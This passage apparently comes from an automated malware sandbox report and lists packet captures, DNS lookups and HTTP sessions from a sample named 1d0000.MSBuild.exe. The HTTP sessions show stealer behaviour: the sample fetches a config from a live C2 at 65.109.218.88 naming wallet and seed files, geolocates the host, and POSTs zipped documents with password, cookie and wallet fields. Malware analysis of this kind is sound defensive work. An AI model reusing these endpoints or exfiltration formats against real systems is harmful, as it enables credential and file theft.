Sep 5, 2024 14:29:16.248675108 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248684883 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248719931 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248738050 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248752117 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248760939 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248769999 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248780012 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248796940 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248806000 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248819113 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248821974 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.248837948 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248861074 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.248884916 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.253062010 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253128052 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253139019 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253149986 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253171921 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253211021 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253290892 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253299952 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253309965 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253324032 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253344059 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253353119 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253374100 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253427029 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253468990 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253478050 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253524065 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253532887 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253545046 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253571033 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253598928 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253611088 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253648996 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253658056 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253671885 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253680944 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253689051 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253731966 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253740072 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253812075 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253819942 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253868103 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253876925 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253937960 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253947020 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253954887 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.253993034 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254000902 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254018068 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254034996 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254059076 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254066944 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254079103 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254106045 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254137039 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254146099 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254160881 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254169941 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254201889 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254304886 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254338980 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254354000 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254365921 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254374027 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254422903 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254431963 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254440069 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254448891 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254466057 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254477978 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254493952 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.254503012 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.338308096 CEST	49673	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:16.443552017 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:16.445991993 CEST	49676	443	192.168.2.8	52.182.143.211
Sep 5, 2024 14:29:16.492911100 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:16.649163961 CEST	49672	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:17.602586031 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:17.603239059 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:17.608109951 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:17.911480904 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:17.912548065 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:17.917368889 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:18.216716051 CEST	443	49704	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:18.216835976 CEST	49704	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:18.251148939 CEST	80	49708	65.109.218.88	192.168.2.8
Sep 5, 2024 14:29:18.265892029 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:18.265950918 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:18.266033888 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:18.266593933 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:18.266609907 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:18.305457115 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:19.001585960 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.001805067 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.004844904 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.004856110 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.005251884 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.006587029 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.008529902 CEST	49677	80	192.168.2.8	192.229.211.108
Sep 5, 2024 14:29:19.048507929 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.368077040 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.368166924 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.368182898 CEST	443	49709	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.368231058 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.374439955 CEST	49709	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.380477905 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.380512953 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:19.380614042 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.380830050 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:19.380841017 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.126506090 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.129539013 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.129575014 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.601810932 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.606753111 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.606772900 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.606838942 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.606874943 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.606893063 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.606928110 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.686487913 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.686572075 CEST	443	49710	87.250.250.50	192.168.2.8
Sep 5, 2024 14:29:20.686686993 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.686686993 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:20.687232018 CEST	49710	443	192.168.2.8	87.250.250.50
Sep 5, 2024 14:29:23.495486975 CEST	49708	80	192.168.2.8	65.109.218.88
Sep 5, 2024 14:29:28.401298046 CEST	49704	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:28.401532888 CEST	49704	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:28.402014017 CEST	49713	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:28.402051926 CEST	443	49713	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:28.402110100 CEST	49713	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:28.406179905 CEST	443	49704	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:28.406261921 CEST	443	49704	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:28.412434101 CEST	49713	443	192.168.2.8	23.206.229.226
Sep 5, 2024 14:29:28.412457943 CEST	443	49713	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:28.993690014 CEST	443	49713	23.206.229.226	192.168.2.8
Sep 5, 2024 14:29:28.993784904 CEST	49713	443	192.168.2.8	23.206.229.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 5, 2024 14:29:11.052393913 CEST	57992	53	192.168.2.8	1.1.1.1
Sep 5, 2024 14:29:11.059288979 CEST	53	57992	1.1.1.1	192.168.2.8
Sep 5, 2024 14:29:14.644743919 CEST	60896	53	192.168.2.8	1.1.1.1
Sep 5, 2024 14:29:14.651838064 CEST	53	60896	1.1.1.1	192.168.2.8
Sep 5, 2024 14:29:18.255635977 CEST	60395	53	192.168.2.8	1.1.1.1
Sep 5, 2024 14:29:18.263622046 CEST	53	60395	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 5, 2024 14:29:11.052393913 CEST	192.168.2.8	1.1.1.1	0x4ad0	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Sep 5, 2024 14:29:14.644743919 CEST	192.168.2.8	1.1.1.1	0xb51f	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 5, 2024 14:29:18.255635977 CEST	192.168.2.8	1.1.1.1	0x17ad	Standard query (0)	disk.yandex.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 5, 2024 14:29:11.059288979 CEST	1.1.1.1	192.168.2.8	0x4ad0	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Sep 5, 2024 14:29:14.651838064 CEST	1.1.1.1	192.168.2.8	0xb51f	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 5, 2024 14:29:18.263622046 CEST	1.1.1.1	192.168.2.8	0x17ad	No error (0)	disk.yandex.com		87.250.250.50	A (IP address)	IN (0x0001)	false
Sep 5, 2024 14:29:27.394973993 CEST	1.1.1.1	192.168.2.8	0x5adf	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 14:29:27.394973993 CEST	1.1.1.1	192.168.2.8	0x5adf	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

disk.yandex.com

65.109.218.88

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	65.109.218.88	80	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 14:29:12.356852055 CEST	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36 Host: 65.109.218.88 Connection: Keep-Alive
Sep 5, 2024 14:29:13.207253933 CEST	243	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:13 GMT Content-Type: text/html Content-Length: 10 Connection: keep-alive Last-Modified: Tue, 30 Jul 2024 15:28:44 GMT ETag: "a-61e78a21cb9c2" Accept-Ranges: bytes Data Raw: 69 6e 64 65 78 2e 68 74 6d 6c Data Ascii: index.html
Sep 5, 2024 14:29:13.209711075 CEST	57	OUT	GET /getjson.php?id=208 HTTP/1.1 Host: 65.109.218.88
Sep 5, 2024 14:29:13.424206018 CEST	243	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:13 GMT Content-Type: text/html Content-Length: 10 Connection: keep-alive Last-Modified: Tue, 30 Jul 2024 15:28:44 GMT ETag: "a-61e78a21cb9c2" Accept-Ranges: bytes Data Raw: 69 6e 64 65 78 2e 68 74 6d 6c Data Ascii: index.html
Sep 5, 2024 14:29:13.940529108 CEST	521	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 342 Connection: keep-alive Vary: Accept-Encoding Data Raw: 7b 0d 0a 09 22 64 65 62 75 67 22 3a 20 22 30 22 2c 0d 0a 09 22 65 6d 75 6c 61 74 65 22 3a 20 22 30 22 2c 0d 0a 09 22 76 69 72 74 75 61 6c 62 6f 78 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 75 73 74 6f 74 61 6c 22 3a 20 22 30 22 2c 0d 0a 09 22 65 72 72 6f 72 22 3a 20 22 31 22 2c 0d 0a 09 22 65 72 72 6f 72 6e 61 6d 65 22 3a 20 22 43 72 61 73 68 20 45 72 72 6f 72 22 2c 0d 0a 09 22 65 72 72 74 65 78 74 62 6f 78 22 3a 20 22 43 72 61 73 68 20 45 72 72 6f 72 22 2c 0d 0a 09 22 63 6f 6d 70 65 74 69 74 6f 72 22 3a 20 22 30 22 2c 0d 0a 09 22 73 65 6c 66 6d 65 6c 66 22 3a 20 22 30 22 2c 0d 0a 09 22 64 6f 6d 61 69 6e 64 65 74 65 63 74 22 3a 20 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 3b 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 3b 74 77 69 74 74 65 72 2e 63 6f 6d 22 2c 0d 0a 09 22 66 69 6c 65 78 74 22 3a 20 22 2a 2e 74 78 74 3b 2a 2e 64 6f 63 3b 2a 2e 64 6f 63 78 3b 2a 2e 6a 73 6f 6e 3b 2a 2e 6f 64 74 3b 2a 2e 64 61 74 3b 2a 2e 70 64 66 3b 2a 2e 72 74 66 3b 2a 2e 65 6d 6c 3b 2a 2e 77 61 6c 6c 65 74 3b 2a 73 65 65 64 2a [TRUNCATED] Data Ascii: {"debug": "0","emulate": "0","virtualbox": "1","virustotal": "0","error": "1","errorname": "Crash Error","errtextbox": "Crash Error","competitor": "0","selfmelf": "0","domaindetect": "facebook.com;linkedin.com;twitter.com","filext": ".txt;.doc;.docx;.json;.odt;.dat;.pdf;.rtf;.eml;.wallet;seed"}
Sep 5, 2024 14:29:13.958990097 CEST	521	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 12:29:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 342 Connection: keep-alive Vary: Accept-Encoding Data Raw: 7b 0d 0a 09 22 64 65 62 75 67 22 3a 20 22 30 22 2c 0d 0a 09 22 65 6d 75 6c 61 74 65 22 3a 20 22 30 22 2c 0d 0a 09 22 76 69 72 74 75 61 6c 62 6f 78 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 75 73 74 6f 74 61 6c 22 3a 20 22 30 22 2c 0d 0a 09 22 65 72 72 6f 72 22 3a 20 22 31 22 2c 0d 0a 09 22 65 72 72 6f 72 6e 61 6d 65 22 3a 20 22 43 72 61 73 68 20 45 72 72 6f 72 22 2c 0d 0a 09 22 65 72 72 74 65 78 74 62 6f 78 22 3a 20 22 43 72 61 73 68 20 45 72 72 6f 72 22 2c 0d 0a 09 22 63 6f 6d 70 65 74 69 74 6f 72 22 3a 20 22 30 22 2c 0d 0a 09 22 73 65 6c 66 6d 65 6c 66 22 3a 20 22 30 22 2c 0d 0a 09 22 64 6f 6d 61 69 6e 64 65 74 65 63 74 22 3a 20 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 3b 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 3b 74 77 69 74 74 65 72 2e 63 6f 6d 22 2c 0d 0a 09 22 66 69 6c 65 78 74 22 3a 20 22 2a 2e 74 78 74 3b 2a 2e 64 6f 63 3b 2a 2e 64 6f 63 78 3b 2a 2e 6a 73 6f 6e 3b 2a 2e 6f 64 74 3b 2a 2e 64 61 74 3b 2a 2e 70 64 66 3b 2a 2e 72 74 66 3b 2a 2e 65 6d 6c 3b 2a 2e 77 61 6c 6c 65 74 3b 2a 73 65 65 64 2a [TRUNCATED] Data Ascii: {"debug": "0","emulate": "0","virtualbox": "1","virustotal": "0","error": "1","errorname": "Crash Error","errtextbox": "Crash Error","competitor": "0","selfmelf": "0","domaindetect": "facebook.com;linkedin.com;twitter.com","filext": ".txt;.doc;.docx;.json;.odt;.dat;.pdf;.rtf;.eml;.wallet;seed"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	208.95.112.1	80	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 14:29:14.659105062 CEST	78	OUT	GET /json/?fields=11827 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 5, 2024 14:29:15.120493889 CEST	367	IN	HTTP/1.1 200 OK Date: Thu, 05 Sep 2024 12:29:14 GMT Content-Type: application/json; charset=utf-8 Content-Length: 190 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"country":"United States","countryCode":"US","city":"New York","zip":"10123","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	65.109.218.88	80	7416	C:\Users\user\Desktop\1d0000.MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 14:29:15.776683092 CEST	543	OUT	POST /xh.php?id=208&build=nedr&passwords=0&cookies=2&username=user&country=US&ip=8.46.123.33&BSSID=d79588bde78585112204631caa39ca2b&wallets=0&token=xehook208828913883887&ext=0&filters=0&pcname=579569&cardsc=0&telegram=False&discord=False&steam=False&domaindetect= HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/507.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/507.36 Host: 65.109.218.88 Content-Length: 163131 Expect: 100-continue Connection: Keep-Alive
Sep 5, 2024 14:29:16.139096022 CEST	12360	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 1c 59 25 59 2c d7 a4 fc 02 04 00 00 02 04 00 00 1f 00 48 00 46 69 6c 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 49 50 4b 47 45 4c 4e 54 51 59 2e 64 6f 63 78 01 00 20 00 00 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 Data Ascii: PKY%Y,HFiles/Documents/IPKGELNTQY.docx IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMH
Sep 5, 2024 14:29:16.197065115 CEST	2472	OUT	Data Raw: 4c 49 4f 42 53 55 5a 49 56 4b 51 4a 59 51 42 59 57 57 51 42 54 51 46 53 4d 46 43 4d 48 48 4a 47 5a 57 5a 41 49 41 56 48 42 58 47 59 4a 53 4f 51 46 4b 4e 54 5a 50 56 4a 50 58 48 56 44 55 48 5a 42 47 44 55 51 46 53 54 56 41 49 53 45 50 47 4a 50 52 Data Ascii: LIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAE
Sep 5, 2024 14:29:16.197139978 CEST	2472	OUT	Data Raw: 50 58 47 41 59 42 53 43 45 50 4e 51 58 4c 48 51 54 4c 42 59 4d 56 4a 53 4d 41 4c 41 44 52 46 49 57 4d 4b 53 45 4f 5a 52 51 59 49 54 45 53 57 45 58 49 43 4f 58 58 4d 58 5a 58 50 57 56 55 4c 50 4d 4d 48 4f 50 44 4c 44 58 45 4d 45 58 59 52 5a 45 55 Data Ascii: PXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARG
Sep 5, 2024 14:29:16.197276115 CEST	2472	OUT	Data Raw: 50 58 4b 4b 56 55 41 45 44 52 52 47 41 43 57 48 42 5a 49 47 4e 42 5a 53 46 4c 52 57 48 54 4f 4b 45 4b 51 56 4c 5a 46 58 54 59 47 41 4f 54 4d 46 52 4b 53 56 4c 4b 49 49 53 55 42 59 55 42 4e 58 4b 48 59 52 4e 4b 41 4e 53 52 47 50 41 45 4d 4c 52 45 Data Ascii: PXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFNECPKCHXQLLRMXEEWUGQGJVHHPKY%YMHu(HFiles/Desktop/SFPUSAFIOL/SFPUSAFIOL.docx (
Sep 5, 2024 14:29:16.197321892 CEST	4944	OUT	Data Raw: 4b 03 04 14 00 00 00 00 00 1c 59 25 59 fd 2b 90 6a 02 04 00 00 02 04 00 00 1f 00 48 00 46 69 6c 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 4c 53 42 49 48 51 46 44 56 54 2e 64 6f 63 78 01 00 20 00 00 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: KY%Y+jHFiles/Documents/LSBIHQFDVT.docx ?M 333LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAA
Sep 5, 2024 14:29:16.197424889 CEST	4944	OUT	Data Raw: 45 53 46 59 44 4f 53 58 56 4f 53 54 55 43 55 56 52 4e 46 42 41 4d 48 43 56 57 44 55 5a 51 46 43 48 52 4f 4e 4a 47 5a 41 44 41 55 4d 53 47 54 4e 55 4e 59 53 4a 45 59 4e 41 4a 56 4e 48 47 4e 47 45 4b 45 48 46 55 48 53 57 4d 50 53 54 4c 44 59 54 46 Data Ascii: ESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNO
Sep 5, 2024 14:29:16.197443962 CEST	2472	OUT	Data Raw: 55 58 4f 56 56 53 43 5a 46 49 5a 4e 49 50 56 46 46 42 58 4f 54 45 52 58 43 51 47 4d 5a 49 4a 4a 4b 44 43 52 59 46 58 43 59 46 41 50 54 50 4b 4c 58 45 46 57 5a 4b 54 4f 45 4c 5a 55 4f 4c 43 56 45 4f 4e 56 5a 55 41 4f 4a 54 5a 56 57 55 4a 57 46 50 Data Ascii: UXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSO
